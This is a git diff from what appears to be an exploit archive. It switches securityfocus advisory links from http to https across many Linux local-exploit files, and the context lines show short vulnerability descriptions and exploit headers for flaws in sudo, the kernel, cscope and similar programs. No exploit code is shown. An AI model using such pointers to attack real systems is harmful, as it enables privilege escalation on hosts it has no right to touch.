b/exploits/linux/local/23743.txt index ffee0a60f..f55b42222 100644 --- a/exploits/linux/local/23743.txt +++ b/exploits/linux/local/23743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9724/info +source: https://www.securityfocus.com/bid/9724/info Load Sharing Facility eauth component has been reported prone to privilege escalation vulnerability. The eauth component is responsible for controlling authentication procedures within Load Sharing Facility. An issue has been reported where an attacker may send commands to Load Sharing Facility as any user. The issue presents itself because eauth uses an environment variable to determine the UID of the user invoking the binary. diff --git a/exploits/linux/local/23759.pl b/exploits/linux/local/23759.pl index 2be200e84..950d4cc67 100755 --- a/exploits/linux/local/23759.pl +++ b/exploits/linux/local/23759.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9746/info +source: https://www.securityfocus.com/bid/9746/info It has been reported that mformat is prone to a privilege escalation vulnerability when installed as a setUID application. This issue is due to a design error allowing a user to create any arbitrary files as the root user. diff --git a/exploits/linux/local/23849.txt b/exploits/linux/local/23849.txt index b1e9627b4..dd0dec0b6 100644 --- a/exploits/linux/local/23849.txt +++ b/exploits/linux/local/23849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9922/info +source: https://www.securityfocus.com/bid/9922/info It has been reported that the FVWM fvwm_make_browse_menu.sh script is prone to a command execution vulnerability. This issue is due to the script allowing a user to define which application should be used to execute the file via its filename. diff --git a/exploits/linux/local/23882.pas b/exploits/linux/local/23882.pas index 7ead47546..bdb19c9e9 100644 --- a/exploits/linux/local/23882.pas +++ b/exploits/linux/local/23882.pas @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9981/info +source: https://www.securityfocus.com/bid/9981/info NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme. diff --git a/exploits/linux/local/23892.c b/exploits/linux/local/23892.c index 291a090ff..3c9d35d38 100644 --- a/exploits/linux/local/23892.c +++ b/exploits/linux/local/23892.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9998/info +// source: https://www.securityfocus.com/bid/9998/info Systrace has been reported prone to a vulnerability that may permit an application to completely bypass a Systrace policy. The issue presents itself because Systrace does not perform sufficient sanity checks while handling a process that is being traced with ptrace. diff --git a/exploits/linux/local/24027.txt b/exploits/linux/local/24027.txt index 7a6de14df..c74ca31b5 100644 --- a/exploits/linux/local/24027.txt +++ b/exploits/linux/local/24027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10178/info +source: https://www.securityfocus.com/bid/10178/info It has been reported that utempter is affected by multiple local vulnerabilities. The first issue is due to an input validation error that causes the application to exit improperly; facilitating symbolic link attacks. The second issue is due to a failure of the application to properly validate buffer boundaries. diff --git a/exploits/linux/local/24043.c b/exploits/linux/local/24043.c index 90d1f192e..29093de0a 100644 --- a/exploits/linux/local/24043.c +++ b/exploits/linux/local/24043.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10201/info +source: https://www.securityfocus.com/bid/10201/info A local integer handling vulnerability has been announced in the Linux kernel. It is reported that this vulnerability may be exploited by an unprivileged local user to obtain kernel memory contents. Additionally it is reported that a root user may exploit this issue to write to arbitrary regions of kernel memory, which may be a vulnerability in non-standard security enhanced systems where uid 0 does not have this privilege. diff --git a/exploits/linux/local/24123.sh b/exploits/linux/local/24123.sh index 0d5037a7a..9d9e44a40 100755 --- a/exploits/linux/local/24123.sh +++ b/exploits/linux/local/24123.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10361/info +source: https://www.securityfocus.com/bid/10361/info The 'wget' utility has been reported prone to a race-condition vulnerability. The issue exists because wget doesn't lock files that it creates and writes to during file downloads. diff --git a/exploits/linux/local/24141.txt b/exploits/linux/local/24141.txt index ae9c61b00..168d84828 100644 --- a/exploits/linux/local/24141.txt +++ b/exploits/linux/local/24141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10407/info +source: https://www.securityfocus.com/bid/10407/info cPanel is reported prone to a privilege escalation vulnerability. It is reported that the options used by cPanel to compile Apache 1.3.29 and PHP using the mod_phpsuexec option are insecure. These settings will reportedly permit a local attacker to execute arbitrary code as any user who possesses a PHP file that is published to the Apache web server. diff --git a/exploits/linux/local/24182.c b/exploits/linux/local/24182.c index 8754a2aed..99ef49deb 100644 --- a/exploits/linux/local/24182.c +++ b/exploits/linux/local/24182.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10499/info +// source: https://www.securityfocus.com/bid/10499/info CVS is prone to multiple vulnerabilities. The issues include a double free vulnerability, format string vulnerabilities, and integer overflows. There is also a null termination issue in the security patch for BID 10384, potentially leading to a server crash. Some of these issues may be leveraged to execute arbitrary code, while other issues may only result in a denial of service. diff --git a/exploits/linux/local/24278.sh b/exploits/linux/local/24278.sh index f063cb9ac..f87490eed 100755 --- a/exploits/linux/local/24278.sh +++ b/exploits/linux/local/24278.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10717/info +source: https://www.securityfocus.com/bid/10717/info IM-Switch Insecure Temporary File Handling Symbolic Link VulnerabilityIt is reported that im-switch is prone to a local insecure temporary file handling symbolic link vulnerability. This issue is due to a design error that allows the application to insecurely write to a temporary file that is created with a predictable file name. diff --git a/exploits/linux/local/24398.sh b/exploits/linux/local/24398.sh index 34e84988e..d2a19e987 100755 --- a/exploits/linux/local/24398.sh +++ b/exploits/linux/local/24398.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11008/info +source: https://www.securityfocus.com/bid/11008/info IMWheel is reported prone to a predictable temporary file creation vulnerability. This issue is a race condition error and may allow a local attacker to carry out denial of service attacks against other users and possibly gain elevated privileges. diff --git a/exploits/linux/local/24406.txt b/exploits/linux/local/24406.txt index 5de8fdf1e..397a1b94d 100644 --- a/exploits/linux/local/24406.txt +++ b/exploits/linux/local/24406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11025/info +source: https://www.securityfocus.com/bid/11025/info Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames. diff --git a/exploits/linux/local/24421.c b/exploits/linux/local/24421.c index 67a392697..1a1224fd9 100644 --- a/exploits/linux/local/24421.c +++ b/exploits/linux/local/24421.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11077/info +// source: https://www.securityfocus.com/bid/11077/info The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application. diff --git a/exploits/linux/local/24570.txt b/exploits/linux/local/24570.txt index 7b7c71df9..85b8f1049 100644 --- a/exploits/linux/local/24570.txt +++ b/exploits/linux/local/24570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11105/info +source: https://www.securityfocus.com/bid/11105/info QNX PPoEd is reported prone to a problem that exists in the handling of paths to external executables that are employed by PPPoEd. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed. diff --git a/exploits/linux/local/24606.c b/exploits/linux/local/24606.c index f333bbbb0..a95f99931 100644 --- a/exploits/linux/local/24606.c +++ b/exploits/linux/local/24606.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11204/info +// source: https://www.securityfocus.com/bid/11204/info Sudo is reported prone to an information disclosure vulnerability. diff --git a/exploits/linux/local/24694.c b/exploits/linux/local/24694.c index 8172c9355..72610c607 100644 --- a/exploits/linux/local/24694.c +++ b/exploits/linux/local/24694.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11471/info +// source: https://www.securityfocus.com/bid/11471/info The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. diff --git a/exploits/linux/local/24749.sh b/exploits/linux/local/24749.sh index b567cc859..287164435 100755 --- a/exploits/linux/local/24749.sh +++ b/exploits/linux/local/24749.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11697/info +source: https://www.securityfocus.com/bid/11697/info Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. diff --git a/exploits/linux/local/24750.c b/exploits/linux/local/24750.c index 5f582a906..e9ccaa9d4 100644 --- a/exploits/linux/local/24750.c +++ b/exploits/linux/local/24750.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11697/info +// source: https://www.securityfocus.com/bid/11697/info Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. diff --git a/exploits/linux/local/24757.java b/exploits/linux/local/24757.java index 9e2e1ad72..fa52b089f 100644 --- a/exploits/linux/local/24757.java +++ b/exploits/linux/local/24757.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/local/24758.java b/exploits/linux/local/24758.java index cdf96e60a..2016fde5d 100644 --- a/exploits/linux/local/24758.java +++ b/exploits/linux/local/24758.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/local/25106.c b/exploits/linux/local/25106.c index 6d4844633..fc6bf8760 100644 --- a/exploits/linux/local/25106.c +++ b/exploits/linux/local/25106.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12569/info +// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. diff --git a/exploits/linux/local/25202.c b/exploits/linux/local/25202.c index 4f218870f..bc351116b 100644 --- a/exploits/linux/local/25202.c +++ b/exploits/linux/local/25202.c @@ -1,7 +1,7 @@ /* EDB Note: Updated exploit can be found here; https://www.exploit-db.com/exploits/25203/ -source: http://www.securityfocus.com/bid/12763/info +source: https://www.securityfocus.com/bid/12763/info A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values. diff --git a/exploits/linux/local/25288.c b/exploits/linux/local/25288.c index 805551db8..25594ef5b 100644 --- a/exploits/linux/local/25288.c +++ b/exploits/linux/local/25288.c @@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/local/25289.c b/exploits/linux/local/25289.c index 7405ba6dc..2635dac25 100644 --- a/exploits/linux/local/25289.c +++ b/exploits/linux/local/25289.c @@ -1,7 +1,7 @@ /* EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/ -source: http://www.securityfocus.com/bid/12911/info +source: https://www.securityfocus.com/bid/12911/info A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. diff --git a/exploits/linux/local/25688.txt b/exploits/linux/local/25688.txt index 429bbe137..fd7d2f242 100644 --- a/exploits/linux/local/25688.txt +++ b/exploits/linux/local/25688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13699/info +source: https://www.securityfocus.com/bid/13699/info gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers. diff --git a/exploits/linux/local/25707.txt b/exploits/linux/local/25707.txt index 3e14ee8ef..bba71cba6 100644 --- a/exploits/linux/local/25707.txt +++ b/exploits/linux/local/25707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13775/info +source: https://www.securityfocus.com/bid/13775/info Both cryptoloop and dm-crypt are reported prone to an information disclosure vulnerability. Reports indicate that certain watermarked files may be detected on a filesystem that is encrypted using the affected loop device encryption schemes. diff --git a/exploits/linux/local/25709.sh b/exploits/linux/local/25709.sh index 06e81f117..dea927d6c 100755 --- a/exploits/linux/local/25709.sh +++ b/exploits/linux/local/25709.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13780/info +source: https://www.securityfocus.com/bid/13780/info Gentoo webapp-config is prone to an insecure file creation vulnerability. This issue is due to a design error that causes the application to fail to verify the existence of a file before writing to it. diff --git a/exploits/linux/local/25789.c b/exploits/linux/local/25789.c index 17cc77e05..56d9a1473 100644 --- a/exploits/linux/local/25789.c +++ b/exploits/linux/local/25789.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13857/info +// source: https://www.securityfocus.com/bid/13857/info FUSE is susceptible to a local information disclosure vulnerability. This issue is due to a failure of the kernel module to properly clear used memory prior to its reuse. diff --git a/exploits/linux/local/25947.txt b/exploits/linux/local/25947.txt index 9194227d4..0a976317f 100644 --- a/exploits/linux/local/25947.txt +++ b/exploits/linux/local/25947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14169/info +source: https://www.securityfocus.com/bid/14169/info GNU GNATS gen-index allows local attackers to disclose and overwrite arbitrary files. diff --git a/exploits/linux/local/25993.sh b/exploits/linux/local/25993.sh index 8c0a27c77..a771b468f 100755 --- a/exploits/linux/local/25993.sh +++ b/exploits/linux/local/25993.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14293/info +source: https://www.securityfocus.com/bid/14293/info Skype is affected by an insecure temporary file creation vulnerability. diff --git a/exploits/linux/local/26100.sh b/exploits/linux/local/26100.sh index 804ce5600..ddded0ba0 100755 --- a/exploits/linux/local/26100.sh +++ b/exploits/linux/local/26100.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14486/info +source: https://www.securityfocus.com/bid/14486/info Lantronix Secure Console Server SCS820/SCS1620 devices are susceptible to multiple local vulnerabilities. diff --git a/exploits/linux/local/26195.txt b/exploits/linux/local/26195.txt index dc8b350e0..95dc5c11d 100644 --- a/exploits/linux/local/26195.txt +++ b/exploits/linux/local/26195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14656/info +source: https://www.securityfocus.com/bid/14656/info QNX RTOS is susceptible to a local arbitrary file disclosure vulnerability. This issue is due to a failure of the 'inputtrap' utility to properly implement access control restrictions. diff --git a/exploits/linux/local/26218.txt b/exploits/linux/local/26218.txt index 641ff4614..7a951dea2 100644 --- a/exploits/linux/local/26218.txt +++ b/exploits/linux/local/26218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14711/info +source: https://www.securityfocus.com/bid/14711/info Frox is prone to a vulnerability that permits read access to arbitrary files. diff --git a/exploits/linux/local/26321.c b/exploits/linux/local/26321.c index 1d58559ee..165ca0416 100644 --- a/exploits/linux/local/26321.c +++ b/exploits/linux/local/26321.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15004/info +// source: https://www.securityfocus.com/bid/15004/info 'gnome-pty-helper' is susceptible to a local UTMP hostname spoofing vulnerability. This issue is due to the failure of the application to properly validate user-supplied data prior to using it to update UTMP records. diff --git a/exploits/linux/local/26353.txt b/exploits/linux/local/26353.txt index 69b8d0173..5421e8cc9 100644 --- a/exploits/linux/local/26353.txt +++ b/exploits/linux/local/26353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15122/info +source: https://www.securityfocus.com/bid/15122/info The Linux kernel is susceptible to a local command-injection vulnerability via console keymap modifications. This issue occurs because unprivileged users can alter the system-wide console keymap. diff --git a/exploits/linux/local/26492.txt b/exploits/linux/local/26492.txt index 5c5875277..170c5e163 100644 --- a/exploits/linux/local/26492.txt +++ b/exploits/linux/local/26492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15375/info +source: https://www.securityfocus.com/bid/15375/info Emacs is susceptible to an arbitrary command execution vulnerability with local variables. This issue is due to insufficient sanitization of user-supplied input. diff --git a/exploits/linux/local/26498.txt b/exploits/linux/local/26498.txt index 5b0b3f30f..4485449a5 100644 --- a/exploits/linux/local/26498.txt +++ b/exploits/linux/local/26498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15394/info +source: https://www.securityfocus.com/bid/15394/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored. @@ -8,7 +8,7 @@ To exploit this vulnerability, an attacker must be able to run Perl scripts thro ## Sudo local root exploit ## ## vuln versions : sudo < 1.6.8p12 -## adv : http://www.securityfocus.com/bid/15394 +## adv : https://www.securityfocus.com/bid/15394 ## adv : http://www.frsirt.com/bulletins/2642 ##by breno - breno@kalangolinux.org diff --git a/exploits/linux/local/27056.pl b/exploits/linux/local/27056.pl index b720e4bc8..37049c186 100755 --- a/exploits/linux/local/27056.pl +++ b/exploits/linux/local/27056.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16184/info +source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. @@ -10,7 +10,7 @@ This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Secu ## Sudo local root exploit ## ## vuln versions : sudo < 1.6.8p12 -## adv : http://www.securityfocus.com/bid/15394 +## adv : https://www.securityfocus.com/bid/15394 ## adv : http://www.frsirt.com/bulletins/2642 ##by breno - breno@kalangolinux.org diff --git a/exploits/linux/local/27057.py b/exploits/linux/local/27057.py index 99e818188..6997c2e21 100755 --- a/exploits/linux/local/27057.py +++ b/exploits/linux/local/27057.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16184/info +source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. @@ -10,7 +10,7 @@ This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Secu ## Sudo local root escalation privilege ## ## vuln versions : sudo < 1.6.8p10 -## adv : http://www.securityfocus.com/bid/16184 +## adv : https://www.securityfocus.com/bid/16184 ## by breno - breno at kalangolinux dot org ## You need sudo access execution for some python script ## diff --git a/exploits/linux/local/27065.txt b/exploits/linux/local/27065.txt index c6f0a8039..b95068a9a 100644 --- a/exploits/linux/local/27065.txt +++ b/exploits/linux/local/27065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16205/info +source: https://www.securityfocus.com/bid/16205/info Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges. diff --git a/exploits/linux/local/27066.txt b/exploits/linux/local/27066.txt index a73bb02e4..d2ce97dc7 100644 --- a/exploits/linux/local/27066.txt +++ b/exploits/linux/local/27066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16205/info +source: https://www.securityfocus.com/bid/16205/info Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges. diff --git a/exploits/linux/local/27231.txt b/exploits/linux/local/27231.txt index b1ba3c3a5..297f50928 100644 --- a/exploits/linux/local/27231.txt +++ b/exploits/linux/local/27231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16663/info +source: https://www.securityfocus.com/bid/16663/info GnuPG is affected by a detached signature verification-bypass vulnerability because it fails to properly notify scripts that an invalid detached signature was presented and that the verification process has failed. diff --git a/exploits/linux/local/27461.c b/exploits/linux/local/27461.c index c27c961fa..1823dade3 100644 --- a/exploits/linux/local/27461.c +++ b/exploits/linux/local/27461.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/17203/info +source: https://www.securityfocus.com/bid/17203/info The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users. diff --git a/exploits/linux/local/27766.txt b/exploits/linux/local/27766.txt index ad75b5566..ed41e4d5c 100644 --- a/exploits/linux/local/27766.txt +++ b/exploits/linux/local/27766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17735/info +source: https://www.securityfocus.com/bid/17735/info The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. diff --git a/exploits/linux/local/27769.txt b/exploits/linux/local/27769.txt index 4b85a2603..bb9c89cec 100644 --- a/exploits/linux/local/27769.txt +++ b/exploits/linux/local/27769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17742/info +source: https://www.securityfocus.com/bid/17742/info The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data. diff --git a/exploits/linux/local/28287.c b/exploits/linux/local/28287.c index 7ee9c20dc..ccb9644f6 100644 --- a/exploits/linux/local/28287.c +++ b/exploits/linux/local/28287.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19186/info +// source: https://www.securityfocus.com/bid/19186/info Since Linux-HA Heartbeat has insecure default permissions set on shared memory, local attackers may be able to cause a denial of service. diff --git a/exploits/linux/local/28288.c b/exploits/linux/local/28288.c index 777036ce4..1632e2791 100644 --- a/exploits/linux/local/28288.c +++ b/exploits/linux/local/28288.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19190/info +// source: https://www.securityfocus.com/bid/19190/info Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. diff --git a/exploits/linux/local/28405.txt b/exploits/linux/local/28405.txt index ca2dc2a13..1104fbd68 100644 --- a/exploits/linux/local/28405.txt +++ b/exploits/linux/local/28405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19596/info +source: https://www.securityfocus.com/bid/19596/info Roxio Toast is prone to a local privilege-escalation vulnerability because it fails to properly sanitize user-supplied input. As a result, local users may set their own search path for external applications that are called by setuid programs that are included in Roxio Toast. diff --git a/exploits/linux/local/28806.txt b/exploits/linux/local/28806.txt index bdbbce5c3..bc5c0d364 100644 --- a/exploits/linux/local/28806.txt +++ b/exploits/linux/local/28806.txt @@ -107,7 +107,7 @@ clean: # Version: 1.4.6 (tested), 1.4.7 (untested) # Tested on: Xubuntu 12.04 x86_64 # CVE: 2013-4362 -# Info: Vulnerability reported by Werner Baumann: http://www.securityfocus.com/bid/62445 +# Info: Vulnerability reported by Werner Baumann: https://www.securityfocus.com/bid/62445 KERNELV=`uname -r` echo "#######################################" diff --git a/exploits/linux/local/29446.c b/exploits/linux/local/29446.c index 73b466fb5..cf80efb5f 100644 --- a/exploits/linux/local/29446.c +++ b/exploits/linux/local/29446.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/22014/info +source: https://www.securityfocus.com/bid/22014/info Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/29467.c b/exploits/linux/local/29467.c index d45dbbf75..8f944890f 100644 --- a/exploits/linux/local/29467.c +++ b/exploits/linux/local/29467.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22071/info +// source: https://www.securityfocus.com/bid/22071/info Rixstep Undercover is prone to a local privilege-escalation vulnerability because of a design error in the affected application. diff --git a/exploits/linux/local/29714.txt b/exploits/linux/local/29714.txt index 605b5436a..0ddc59ff7 100644 --- a/exploits/linux/local/29714.txt +++ b/exploits/linux/local/29714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22823/info +source: https://www.securityfocus.com/bid/22823/info The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/29746.txt b/exploits/linux/local/29746.txt index 78a95cb11..4af592bd5 100644 --- a/exploits/linux/local/29746.txt +++ b/exploits/linux/local/29746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22985/info +source: https://www.securityfocus.com/bid/22985/info Horde Framework and IMP are prone to a vulnerability that allows a local attacker to delete arbitrary files in the context of the user running the application. diff --git a/exploits/linux/local/29822.c b/exploits/linux/local/29822.c index b6fe3ed88..e7ea3f44a 100644 --- a/exploits/linux/local/29822.c +++ b/exploits/linux/local/29822.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23355/info +// source: https://www.securityfocus.com/bid/23355/info The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. diff --git a/exploits/linux/local/29954.txt b/exploits/linux/local/29954.txt index b76fe5421..62a1408b2 100644 --- a/exploits/linux/local/29954.txt +++ b/exploits/linux/local/29954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23844/info +source: https://www.securityfocus.com/bid/23844/info ELinks is prone to an arbitrary code-execution vulnerability. diff --git a/exploits/linux/local/30093.txt b/exploits/linux/local/30093.txt index e131f7e02..36b690c9a 100644 --- a/exploits/linux/local/30093.txt +++ b/exploits/linux/local/30093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24192/info +source: https://www.securityfocus.com/bid/24192/info Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. diff --git a/exploits/linux/local/30280.txt b/exploits/linux/local/30280.txt index 3d01d7109..59e6af01a 100644 --- a/exploits/linux/local/30280.txt +++ b/exploits/linux/local/30280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24780/info +source: https://www.securityfocus.com/bid/24780/info GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers. diff --git a/exploits/linux/local/30464.c b/exploits/linux/local/30464.c index 8b2b17721..618e1dbe9 100644 --- a/exploits/linux/local/30464.c +++ b/exploits/linux/local/30464.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25251/info +source: https://www.securityfocus.com/bid/25251/info GSWKT (Generic Software Wrappers Toolkit) is prone to multiple concurrency vulnerabilities because of its implementation of system call wrappers. This problem can result in a race condition between a user thread and the kernel. diff --git a/exploits/linux/local/30503.txt b/exploits/linux/local/30503.txt index fafbf790f..966de9aba 100644 --- a/exploits/linux/local/30503.txt +++ b/exploits/linux/local/30503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25342/info +source: https://www.securityfocus.com/bid/25342/info BlueCat Networks Adonis devices are prone to a remote privilege-escalation vulnerability because the software fails to properly sanitize user-supplied input. diff --git a/exploits/linux/local/30604.c b/exploits/linux/local/30604.c index b540e7bb1..d761965b4 100644 --- a/exploits/linux/local/30604.c +++ b/exploits/linux/local/30604.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25774/info +source: https://www.securityfocus.com/bid/25774/info The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/30605.c b/exploits/linux/local/30605.c index eb9615817..283303087 100644 --- a/exploits/linux/local/30605.c +++ b/exploits/linux/local/30605.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/25774/info +source: https://www.securityfocus.com/bid/25774/info /* The Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/30620.txt b/exploits/linux/local/30620.txt index 3437335fb..a6cca0c33 100644 --- a/exploits/linux/local/30620.txt +++ b/exploits/linux/local/30620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25825/info +source: https://www.securityfocus.com/bid/25825/info Xen is prone to a local command-injection vulnerability that can lead to privilege escalation. diff --git a/exploits/linux/local/30780.txt b/exploits/linux/local/30780.txt index 5398eae77..232c84b13 100644 --- a/exploits/linux/local/30780.txt +++ b/exploits/linux/local/30780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26503/info +source: https://www.securityfocus.com/bid/26503/info ISPmanager is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/31151.c b/exploits/linux/local/31151.c index ad81be356..422fd037e 100644 --- a/exploits/linux/local/31151.c +++ b/exploits/linux/local/31151.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27744/info +// source: https://www.securityfocus.com/bid/27744/info The GKrellWeather plugin for GKrellM is prone to a local stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. diff --git a/exploits/linux/local/31911.txt b/exploits/linux/local/31911.txt index d0d9670db..078420779 100644 --- a/exploits/linux/local/31911.txt +++ b/exploits/linux/local/31911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29715/info +source: https://www.securityfocus.com/bid/29715/info Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/linux/local/31959.txt b/exploits/linux/local/31959.txt index 25582d6a4..ddfd78248 100644 --- a/exploits/linux/local/31959.txt +++ b/exploits/linux/local/31959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29902/info +source: https://www.securityfocus.com/bid/29902/info Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links. diff --git a/exploits/linux/local/32446.txt b/exploits/linux/local/32446.txt index 4bd5d289f..6b88e9e73 100644 --- a/exploits/linux/local/32446.txt +++ b/exploits/linux/local/32446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31499/info +source: https://www.securityfocus.com/bid/31499/info Xen is prone to a vulnerability that results in configuration information being stored in a location that is writable by guest domains. diff --git a/exploits/linux/local/32805.c b/exploits/linux/local/32805.c index 429165e52..a5c98594e 100644 --- a/exploits/linux/local/32805.c +++ b/exploits/linux/local/32805.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33846/info +source: https://www.securityfocus.com/bid/33846/info The Linux Kernel is prone to an information-disclosure vulnerability because it 